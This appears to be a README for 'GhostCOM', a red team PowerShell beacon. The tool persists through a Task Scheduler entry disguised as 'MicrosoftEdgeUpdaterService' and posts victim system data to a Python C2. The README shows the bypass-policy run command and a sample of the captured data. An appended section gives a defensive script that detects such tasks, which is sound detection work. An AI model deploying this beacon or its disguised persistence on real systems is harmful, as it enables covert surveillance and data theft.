A COM-based PowerShell beacon for red team persistence using Task Scheduler.
GhostCOM is a custom red team beacon built with PowerShell and Python that demonstrates persistence via the COM-based `Schedule.Service` interface. The beacon collects system information and sends it to a custom C2 server.
- COM-based persistence using Task Scheduler (`Schedule.Service`)
- Beacon sends victim system info to C2
- Two versions:
  - Basic: OS version, username, PC name, IP
  - Advanced: Active processes, firewall status, and more
- Custom C2 built in Python
- PowerShell script runs on target machine.
- Collects system information (based on version).
- Sends info to attacker's C2 server.
- Sets up persistence using `Schedule.Service` to auto-run on boot.
The C2 is a custom Python-based HTTP listener that receives incoming system information from beacons.
Currently, only hardcoded data is sent. Shell functionality is not implemented (yet).
- Windows machine (target system)
- PowerShell (v5+ recommended)
- Python-based C2 server running (e.g., `python c2_server.py` on attacker's machine)
- Adjust the IP (`http://192.168.1.193/`) in the script to point to your actual C2 listener
- Start C2 Server on Attacker:

```
┌──(synix㉿0day)-[~/Desktop]
└─$ python3 C2.py
[+] C2 Server Running on Port 80...
```
- Execute script on Target:

```
powershell.exe -ExecutionPolicy Bypass -File .\beacon.ps1
```
- What Happens:
  - One-time system info is sent to your C2 server.
  - A scheduled task (`MicrosoftEdgeUpdaterService`) is created to re-run a silent beacon on every logon.
- C2 retrieves the data:

```
┌──(synix㉿0day)-[~/Desktop]
└─$ python3 C2.py
[+] C2 Server Running on Port 80...
[+] Beacon Data Received:
Processes: Name CPU
---- ---
SearchApp 2.359375
explorer 1.953125
powershell 1.21875
RuntimeBroker 0.828125
StartMenuExperienceHost 0.609375
Time: 22-05-2025 18:21:26
Av: Windows Defender
Hostname: BLACKSITE-10
Os: Microsoft Windows 10 Pro
Uptime: 22-05-2025 18:20:58
Software: Oracle VirtualBox Guest Additions 7.1.6, Microsoft Visual C 2022 X64 Minimum Runtime - 14.44.34918,
Application Verifier x64 External Package, vs_minshellinteropx64msi, Application Verifier x64 External Package (DesktopEditions),
Microsoft Visual C 2022 X64 Debug Runtime - 14.44.34918, vs_devenx64vmsi...
Firewall: Name Enabled
---- -------
Domain True
Private True
Public True
User: RTO
192.168.1.11 - - [22/May/2025 18:21:24] "POST /collect HTTP/1.1" 200 -
```
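To audit a host for this style of persistence, the following PowerShell (added here, not part of GhostCOM) walks the whole task tree through the same `Schedule.Service` COM interface and flags tasks that launch PowerShell with the switches shown above or that fire at logon/boot; the argument heuristics and the exact-name match on `MicrosoftEdgeUpdaterService` are assumptions drawn from this README, not from the beacon's source.

```powershell
# Added audit script (not part of GhostCOM): enumerate every scheduled task via the
# Schedule.Service COM interface and report PowerShell-launching tasks with the
# hidden/bypass switches or logon/boot triggers described in this README.
$svc = New-Object -ComObject Schedule.Service
$svc.Connect()   # no argument = local machine; pass a hostname to audit a remote host

# Heuristics (assumed from the README, tune for your environment)
$SuspiciousArgs = '-ExecutionPolicy\s+Bypass|-WindowStyle\s+Hidden|-w\s+hidden|-EncodedCommand|-enc\b'
$KnownBadName   = 'MicrosoftEdgeUpdaterService'        # task name used by this beacon
$TriggerNames   = @{ 8 = 'Boot'; 9 = 'Logon' }         # TASK_TRIGGER_BOOT / TASK_TRIGGER_LOGON

function Get-AllTasks($Folder) {
    $Folder.GetTasks(1)                                # 1 = TASK_ENUM_HIDDEN: include hidden tasks
    foreach ($sub in $Folder.GetFolders(0)) { Get-AllTasks $sub }
}

$findings = foreach ($task in Get-AllTasks $svc.GetFolder('\')) {
    $def = $task.Definition
    # Collect the auto-start triggers (logon/boot) defined on this task
    $autoTrig = @($def.Triggers |
        Where-Object { $TriggerNames.ContainsKey([int]$_.Type) } |
        ForEach-Object { $TriggerNames[[int]$_.Type] })

    # Only Exec actions (Type 0 = TASK_ACTION_EXEC) expose Path/Arguments
    foreach ($a in @($def.Actions | Where-Object { $_.Type -eq 0 })) {
        $isPwsh  = $a.Path -match '(powershell|pwsh)(\.exe)?$'
        $badArgs = $a.Arguments -match $SuspiciousArgs
        $badName = $task.Name -eq $KnownBadName
        if ($badName -or ($isPwsh -and ($badArgs -or $autoTrig.Count -gt 0))) {
            [pscustomobject]@{
                TaskPath   = $task.Path
                Author     = $def.RegistrationInfo.Author
                Registered = $def.RegistrationInfo.Date
                Triggers   = ($autoTrig -join ',')
                Command    = "$($a.Path) $($a.Arguments)"
                Reason     = @(
                    if ($badName) { 'known-name' }
                    if ($badArgs) { 'suspicious-args' }
                    if ($autoTrig.Count -gt 0) { 'auto-start' }
                ) -join ','
            }
        }
    }
}

$findings | Format-Table -AutoSize -Wrap
```

Legitimate software also registers PowerShell tasks at logon, so treat the `auto-start` reason alone as a review queue and the `known-name` or `suspicious-args` hits as the ones to triage first.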
Caution
This tool is provided for educational and research purposes only. Use only in controlled environments with proper authorization. The author is not responsible for any misuse.
- Add shell functionality to beacon
- Encrypt beacon-C2 communication
- More functionality to beacon